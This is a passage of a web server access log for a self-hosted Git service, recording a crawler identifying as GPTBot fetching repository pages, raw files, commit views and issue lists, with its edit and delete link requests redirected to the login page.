2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:17:32:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:17:32:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:17:32:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresWatchdog/libgcc_s_seh-1.dll" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libgcc_s_seh-1.dll" +[17/Feb/2026:17:32:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresWatchdog/libgcc_s_seh-1.dll" +[17/Feb/2026:17:32:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresWatchdog/libgcc_s_seh-1.dll" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libgcc_s_seh-1.dll" +[17/Feb/2026:17:32:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresWatchdog/libgcc_s_seh-1.dll" +[17/Feb/2026:17:32:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:17:32:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:17:32:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:17:32:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:17:32:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:17:32:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:17:32:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/assets/images/ControlRoom7.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom7.png" +[17/Feb/2026:17:32:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/assets/images/ControlRoom7.png" +[17/Feb/2026:17:32:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:17:32:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 862] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom3.png" +[17/Feb/2026:17:32:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom7.png" [Client 74.7.227.38] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom7.png" +[17/Feb/2026:17:32:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 862] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:17:32:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 862] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:17:32:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 9793] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:17:32:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:17:32:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:17:32:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 862] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:17:32:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 9793] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom3.png" +[17/Feb/2026:17:32:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/assets/images/ControlRoom7.png" [Client 74.7.227.38] [Length 964] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom7.png" +[17/Feb/2026:17:32:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 9793] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:17:32:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 9793] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:17:32:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 9793] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:17:32:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 862] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:17:32:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/assets/images/ControlRoom7.png" [Client 74.7.227.38] [Length 9849] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom7.png" +[17/Feb/2026:17:32:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:17:32:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresWatchdog/libgcc_s_seh-1.dll" [Client 74.7.227.38] [Length 150852] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libgcc_s_seh-1.dll" +[17/Feb/2026:17:32:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresWatchdog/libgcc_s_seh-1.dll" [Client 74.7.227.38] [Length 880] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libgcc_s_seh-1.dll" +[17/Feb/2026:17:32:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?files=C%2b%2bProject%2f.vscode" [Client 74.7.227.38] [Length 18536] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/.vscode" +[17/Feb/2026:17:32:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/project.assets.json?display=rendered" [Client 74.7.227.38] [Length 11145] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/project.assets.json" +[17/Feb/2026:17:32:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresWatchdog/libstdc++-6.dll" [Client 74.7.227.38] [Length 9816] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libstdc++-6.dll" +[17/Feb/2026:17:32:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresWatchdog/libgcc_s_seh-1.dll" [Client 74.7.227.38] [Length 9804] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libgcc_s_seh-1.dll" +[17/Feb/2026:17:32:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 9980] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&state=all&type=all" +[17/Feb/2026:17:32:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9988] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=mostcomment&state=all&type=all" +[17/Feb/2026:17:32:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=all&type=all" +[17/Feb/2026:17:32:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9995] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=nearduedate&state=all&type=all" +[17/Feb/2026:17:32:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Hero.tsx?display=source" [Client 74.7.227.38] [Length 13917] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Hero.tsx" +[17/Feb/2026:17:32:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Hero.tsx?display=source" [Client 74.7.227.38] [Length 13917] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Hero.tsx" +[17/Feb/2026:17:32:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Hero.tsx?display=source" [Client 74.7.227.38] [Length 13917] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Hero.tsx" +[17/Feb/2026:17:32:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Hero.tsx?display=source" [Client 74.7.227.38] [Length 13889] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Hero.tsx" +[17/Feb/2026:17:32:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10118] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:32:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2fTestApp.dir%2fbuild.make" [Client 74.7.227.38] [Length 28454] [Gzip 5.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:17:32:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2fTestApp.dir%2fdepend.make" [Client 74.7.227.38] [Length 24741] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:17:32:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2fTestApp.dir%2fDependInfo.cmake" [Client 74.7.227.38] [Length 25908] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:17:32:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2fTestApp.dir%2fprogress.make" [Client 74.7.227.38] [Length 24843] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:17:32:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp%2fCMakeFiles%2fCMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 23682] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:17:32:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/Gitea_Manual.md?display=rendered" [Client 74.7.227.38] [Length 17360] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/Gitea_Manual.md" +[17/Feb/2026:17:32:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/Gitea_Manual.md?display=source" [Client 74.7.227.38] [Length 21433] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/Gitea_Manual.md" +[17/Feb/2026:17:32:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11088] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:17:32:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11088] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:17:32:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12022] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:17:32:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10145] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?project=-1&state=all&type=all" +[17/Feb/2026:17:32:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr 